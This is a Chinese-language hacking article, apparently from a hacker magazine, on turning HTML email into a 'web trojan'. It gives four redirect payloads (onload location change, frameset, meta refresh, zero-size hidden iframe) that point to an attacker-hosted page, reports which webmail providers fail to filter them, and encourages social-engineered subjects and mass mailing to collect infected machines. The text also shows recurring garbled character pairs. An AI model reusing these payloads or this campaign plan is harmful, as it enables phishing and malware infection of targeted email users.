大家肯定對網(wǎng)頁木馬已經(jīng)很熟悉了,但大家可能對郵件網(wǎng)頁木馬還不是很熟悉。其實這個也許有些高手以前已經(jīng)發(fā)現(xiàn)并使用很久了。但我一直未見網(wǎng)上及雜志上有此方面的內(nèi)容。這里我就以技術(shù)共享的原則跟大家談?wù)勦]件網(wǎng)頁木馬的思路及實現(xiàn)方法。
郵件網(wǎng)頁木馬的危害巨大,它能化被動為主動。目前網(wǎng)絡(luò)上流行的網(wǎng)頁木馬其實是很被動的,它需要被害者點擊目標(biāo)網(wǎng)址。隨著現(xiàn)在網(wǎng)民的安全觀念的增強,網(wǎng)民一般不會輕易點擊陌生的網(wǎng)址。但郵件網(wǎng)頁木馬就不一樣了,你可以將電子郵件發(fā)送到你想要攻擊的目標(biāo)信箱。只要你根據(jù)社會工程學(xué)及心理學(xué)的知識,將郵件的標(biāo)題看上去不明顯像是垃圾郵件或廣告,那么接收者肯定會點擊此郵件的。只要他點擊了此郵件主題,看了信,哈哈,他就中招了!當(dāng)然你也可以通過郵件群發(fā)器,這樣的話,傳播速率比普通的網(wǎng)頁木馬以及電子書木馬不知高多少呢!而且它有個最大的優(yōu)點,那就是具有目標(biāo)可指定性。它可以攻擊你想要的指定用戶。這一點是普通方法無法比擬的。
郵件網(wǎng)頁木馬其實就是在發(fā)E-mail以HTML方式內(nèi)嵌網(wǎng)頁木馬,使郵件本身成為一張網(wǎng)頁木馬。到這時你也許回大呼,我怎么沒想到啊!呵呵,不怕做不到,只怕想不到啊。其實有些技術(shù)本身并不難,但就是怕不往這方面想啊。我還是趕快轉(zhuǎn)入正題吧,否則,壞柿子扔過來啦!閃!
聰明的你此時可能會說,郵件網(wǎng)頁木馬豈不是很簡單啊,只要在發(fā)郵件是選擇以HTML方式發(fā)送,再將網(wǎng)頁木馬的源代碼寫入即可。事實上當(dāng)然沒這么簡單,因為國內(nèi)的絕大部分電子信箱都對其中一些關(guān)鍵代碼進行的屏蔽過濾。因而本文將重點研究怎樣突破重圍,在電子郵件中引入網(wǎng)頁木馬,達到我們的目的。
一般的網(wǎng)頁木馬都用到j(luò)avasccript,但絕大部分郵件系統(tǒng)都對<script>標(biāo)記作了屏蔽。從而我們只能另辟新法。我們可以不直接將網(wǎng)頁木馬的代碼寫入郵件中,因為如果寫入的話,有關(guān)代碼會被屏蔽,網(wǎng)頁木馬將失效。我們可以寫入轉(zhuǎn)向代碼,使用戶瀏覽此郵件時轉(zhuǎn)向我們放在自己網(wǎng)站上的網(wǎng)頁木馬。當(dāng)然,郵件網(wǎng)頁木馬的難點就在轉(zhuǎn)向代碼。寫轉(zhuǎn)向代碼要有講究,因為寫得不巧妙的話,代碼將會被郵件系統(tǒng)屏蔽。
下面筆者來談?wù)剮追N有效的可以在電子郵件中引入網(wǎng)頁木馬的且沒被郵件服務(wù)器屏蔽的轉(zhuǎn)向代碼。因為絕大部分郵件系統(tǒng)都對<script>標(biāo)記作了屏蔽,所以為了轉(zhuǎn)向代碼有效,均不使用JS和VBS標(biāo)記。
1. window.location 法,代碼如下
| <body onload="window.location='http://xxxxx';"></body> |
2. 框架法,代碼如下
| <frameset cols="100%,*"> <frame src="http://xxxxx" scrolling="auto"> </frameset> |
其中scrolling參數(shù)值得注意,合理使用可加強隱蔽性。Cols參數(shù)可根據(jù)自己的實際情況作更改。
3. META標(biāo)志法,代碼如下
| <META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx"> |
其中CONTENT后面的阿拉伯?dāng)?shù)字是代表過幾秒中鐘轉(zhuǎn)入目標(biāo)網(wǎng)頁。
4. iframe內(nèi)幀法
| <iframe src="http://xxxxx" width="0" height="0" frameborder="0"> |
其中width="0" height="0"是引入網(wǎng)頁的大小尺寸,可以根據(jù)你的實際需要加以調(diào)整。其中的frameborder參數(shù)也很重要,如果使用的恰當(dāng)?shù)脑挘梢栽鰪娻]件網(wǎng)頁木馬的隱蔽性。為了大家看的清楚,我將widt和height均設(shè)置的非零數(shù)值,轉(zhuǎn)向的是網(wǎng)易的首頁(如果轉(zhuǎn)向的是放在自己網(wǎng)站上的網(wǎng)頁木馬,呵呵......)。圖1是設(shè)置frameborder=1的效果,圖2是設(shè)置為frameborder=0的效果。
大家由上面兩幅圖即可知道,如果設(shè)置為frameborder=1,郵件中可看見郵件服務(wù)器自動加帶的頁腳廣告。而設(shè)置為frameborder=0,則如圖2所示,它不像普通的信件一樣看見郵件服務(wù)器自動加帶的廣告。大家可根據(jù)具體情況選擇frameborder參數(shù)來獲得最好的偽裝引入效果,使對方感覺不到他所瀏覽的郵件是已經(jīng)轉(zhuǎn)向到你的網(wǎng)站上的網(wǎng)頁木馬.
上述代碼筆者已經(jīng)對國內(nèi)的幾乎所有電子信箱作了測試,如網(wǎng)易,搜狐,新浪,億唐,21CN,TOM等等。以上四種方法各有千秋。第一種方法的適應(yīng)范圍最小。比如網(wǎng)易、億唐都屏蔽了它。但第2、3、4方法在國內(nèi)的信箱測試中均通過。尤其第2、3種方法幾乎百試百靈。當(dāng)然第4種方法也很經(jīng)典,參數(shù)多,隱蔽性強。大家可根據(jù)不同的目標(biāo)信箱選擇最有效的轉(zhuǎn)向引入代碼。
現(xiàn)在只要大家會制作網(wǎng)頁木馬(關(guān)于網(wǎng)頁木馬木馬的制作方法,大家可以參見以往的黑防),擁有了性能優(yōu)秀的后門程序或木馬程序,再配合本文所講的郵件木馬引入技術(shù)的話,貪心的再來個郵件群發(fā),呵呵,你必將為所欲為,肉雞成群。而且,這種方法具有攻擊目標(biāo)可指定性的優(yōu)點!一場暴風(fēng)雪即將來臨!大家以后還是少在公開場合公布信箱喲!當(dāng)然,穩(wěn)妥的措施是郵件服務(wù)器實行嚴格個代碼過濾,用戶將郵件查看方式設(shè)置為以文本方式查看!
后記:筆者順便還對幾個國外著名的郵箱:hotmail以及Yahoo作了測試,發(fā)現(xiàn)它們過濾得都非常嚴格。上述的4種方法的代碼都被過濾了。此時我深感國內(nèi)郵件提供商與國外的差距。安全觀念的差距!但hotmail以及Yahoo并不是固若金湯。以色列網(wǎng)絡(luò)安全公司GreyMagic Software已經(jīng)發(fā)現(xiàn)hotmail以及Yahoo郵箱也存在過濾不嚴的漏洞。我們可以用同步多媒體集成語言的(SMIL)的HTML+TIME技術(shù)來突破屏蔽,實現(xiàn)轉(zhuǎn)向引入網(wǎng)頁木馬的目的。慶幸的是此漏洞最近已經(jīng)被hotmail以及Yahoo修補。但國內(nèi)的幾乎所有電子信箱均存在此漏洞。當(dāng)然深愛鉆研技術(shù)的你肯定會問,現(xiàn)在是否有針對hotmail以及Yahoo郵箱的有效的轉(zhuǎn)向引入代碼。答案是肯定的!這個問題留給大家思考,大家可以向xml方向去發(fā)散,相信你一定會找到的!
